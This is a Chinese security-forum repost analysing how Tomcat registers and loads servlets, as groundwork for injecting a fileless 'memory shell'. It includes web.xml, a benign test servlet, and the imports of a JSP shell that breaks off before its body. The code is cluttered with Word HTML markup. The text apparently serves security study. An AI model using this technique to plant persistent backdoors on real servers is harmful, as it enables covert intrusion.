设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 Servlet内存马探究
返回列表 发新帖
查看: 2169|回复: 0

Servlet内存马探究

[复制链接]
sandalwood

249

主题

299

帖子

1391

积分

金牌会员

Rank: 6Rank: 6

积分
1391
发表于 2022-3-24 10:13:53 | 显示全部楼层 |阅读模式
原文链接:Servlet内存马探究

Servlet
web.xml


  1. <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  2. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  3. mso-font-kerning:1.0000pt;">   <font face="Calibri">web.xml</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  4. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  5. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  6. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  7. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  8. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  9. mso-font-kerning:1.0000pt;"><font face="Calibri"><?xml version="1.0" encoding="UTF-8"?></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  10. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  11. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  12. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  13. mso-font-kerning:1.0000pt;"><font face="Calibri"><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  14. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  15. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  16. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  17. mso-font-kerning:1.0000pt;">         <font face="Calibri">xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  18. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  19. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  20. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  21. mso-font-kerning:1.0000pt;">         <font face="Calibri">xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  22. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  23. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  24. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  25. mso-font-kerning:1.0000pt;">         <font face="Calibri">version="4.0"</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  26. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  27. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  28. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  29. mso-font-kerning:1.0000pt;">         <font face="Calibri">metadata-complete="false"</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  30. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  31. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  32. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  33. mso-font-kerning:1.0000pt;"><font face="Calibri">></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  34. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  35. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  36. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  37. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  38. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  39. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  40. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  41. mso-font-kerning:1.0000pt;">    <font face="Calibri"><!--</font><font face="宋体">注册</font><font face="Calibri">Servlet--></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  42. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  43. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  44. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  45. mso-font-kerning:1.0000pt;">    <font face="Calibri"><servlet></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  46. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  47. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  48. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  49. mso-font-kerning:1.0000pt;">        <font face="Calibri"><servlet-name>hello</servlet-name></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  50. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  51. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  52. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  53. mso-font-kerning:1.0000pt;">        <font face="Calibri"><servlet-class>com.naihe2.testServlet</servlet-class></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  54. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  55. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  56. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  57. mso-font-kerning:1.0000pt;">    <font face="Calibri"></servlet></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  58. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  59. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  60. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  61. mso-font-kerning:1.0000pt;">    <font face="Calibri"><!--Servlet</font><font face="宋体">的请求路径</font><font face="Calibri">--></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  62. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  63. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  64. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  65. mso-font-kerning:1.0000pt;">    <font face="Calibri"><servlet-mapping></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  66. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  67. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  68. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  69. mso-font-kerning:1.0000pt;">        <font face="Calibri"><servlet-name>hello</servlet-name></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  70. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  71. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  72. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  73. mso-font-kerning:1.0000pt;">        <font face="Calibri"><url-pattern>/hello</url-pattern></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  74. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  75. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  76. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  77. mso-font-kerning:1.0000pt;">    <font face="Calibri"></servlet-mapping></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  78. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  79. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  80. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  81. mso-font-kerning:1.0000pt;"><font face="Calibri"></web-app></font></span></p>
复制代码



    testServlet
  1. <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  2. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  3. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  4. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  5. mso-font-kerning:1.0000pt;"><font face="Calibri">package com.naihe2;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  6. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  7. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  8. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  9. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  10. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  11. mso-font-kerning:1.0000pt;"><font face="Calibri">import javax.servlet.ServletException;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  12. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  13. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  14. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  15. mso-font-kerning:1.0000pt;"><font face="Calibri">import javax.servlet.http.HttpServlet;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  16. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  17. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  18. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  19. mso-font-kerning:1.0000pt;"><font face="Calibri">import javax.servlet.http.HttpServletRequest;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  20. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  21. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  22. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  23. mso-font-kerning:1.0000pt;"><font face="Calibri">import javax.servlet.http.HttpServletResponse;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  24. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  25. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  26. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  27. mso-font-kerning:1.0000pt;"><font face="Calibri">import java.io.IOException;</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  28. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  29. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  30. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  31. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  32. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  33. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  34. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  35. mso-font-kerning:1.0000pt;"><font face="Calibri">public class testServlet extends HttpServlet {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  36. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  37. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  38. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  39. mso-font-kerning:1.0000pt;">    <font face="Calibri">@Override</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  40. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  41. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  42. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  43. mso-font-kerning:1.0000pt;">    <font face="Calibri">protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  44. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  45. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  46. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  47. mso-font-kerning:1.0000pt;">        <font face="Calibri">resp.getWriter().write("123");</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  48. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  49. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  50. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  51. mso-font-kerning:1.0000pt;">    <font face="Calibri">}</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  52. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  53. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  54. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  55. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  56. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  57. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  58. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  59. mso-font-kerning:1.0000pt;">    <font face="Calibri">@Override</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  60. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  61. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  62. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  63. mso-font-kerning:1.0000pt;">    <font face="Calibri">protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  64. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  65. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  66. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  67. mso-font-kerning:1.0000pt;">        <font face="Calibri">doGet(req, resp);</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  68. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  69. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  70. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  71. mso-font-kerning:1.0000pt;">    <font face="Calibri">}</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  72. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  73. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  74. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  75. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  76. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  77. mso-font-kerning:1.0000pt;"> </span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  78. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  79. mso-font-kerning:1.0000pt;"><font face="Calibri">}</font></span></p>
复制代码


分析Servlet生成

    读取web.xml ContextConfig#webConfig()

在这里对其xml文件进行读取

ContextConfig#configureContext()

遍历webxml中的内容,将内容赋给新创建的Wrapper

将类名添加到Wrapper

Wrapper添加到context

StandardContext.createWapper()

在这里添加映射关系,url 路径和 servlet 类做映射。
加载Servlet



遍历内容,比添加到StandardContextlist

这里判断loadOnStartup是否大于0,如果大于才会添加

standardWrapper中的loadOnStatup默认为-1

servlet的配置当中,1的含义是:标记容器是否在启动的时候就加载这个servlet。当值为0或者大于0时,表示容器在应用启动时就加载这个servlet;当是一个负数时或者没有指定时,则指示容器在该servlet被选择时才加载。正数的值越小,启动该servlet的优先级越高。

由于我们要注入内存马,且没有配置xml不会在应用启动时就加载这个servlet,因此需要把优先级调至1,让自己写的servlet直接被加载
遍历list,加载wrapper
Servlet内存马

  1. <p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  2. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  3. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  4. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  5. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="java.lang.reflect.Field" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  6. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  7. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  8. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  9. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="org.apache.catalina.core.StandardContext" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  10. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  11. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  12. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  13. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="org.apache.catalina.connector.Request" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  14. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  15. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  16. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  17. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="java.io.IOException" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  18. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  19. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  20. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  21. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="org.apache.catalina.Wrapper" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  22. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  23. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  24. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  25. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="java.io.InputStream" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  26. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  27. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  28. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  29. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page import="java.io.BufferedInputStream" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  30. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  31. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  32. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  33. mso-font-kerning:1.0000pt;"><font face="Calibri"><%@ page contentType="text/html;charset=UTF-8" language="java" %></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  34. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  35. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  36. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  37. mso-font-kerning:1.0000pt;"><font face="Calibri"><html></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  38. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  39. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  40. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  41. mso-font-kerning:1.0000pt;">  <font face="Calibri"><head></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  42. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  43. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  44. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  45. mso-font-kerning:1.0000pt;">    <font face="Calibri"><title>$Title[        DISCUZ_CODE_22        ]lt;/title></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  46. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  47. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  48. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  49. mso-font-kerning:1.0000pt;">  <font face="Calibri"></head></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  50. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  51. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  52. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  53. mso-font-kerning:1.0000pt;">  <font face="Calibri"><body></font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  54. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  55. mso-font-kerning:1.0000pt;"></span></p><p class="MsoNormal"><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  56. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
  57. mso-font-kerning:1.0000pt;">  <font face="Calibri"><%</font></span><span style="mso-spacerun:'yes';font-family:宋体;mso-ascii-font-family:Calibri;
  58. mso-hansi-font-family:Calibri;mso-bidi-font-family:'Times New Roman';font-size:10.5000pt;
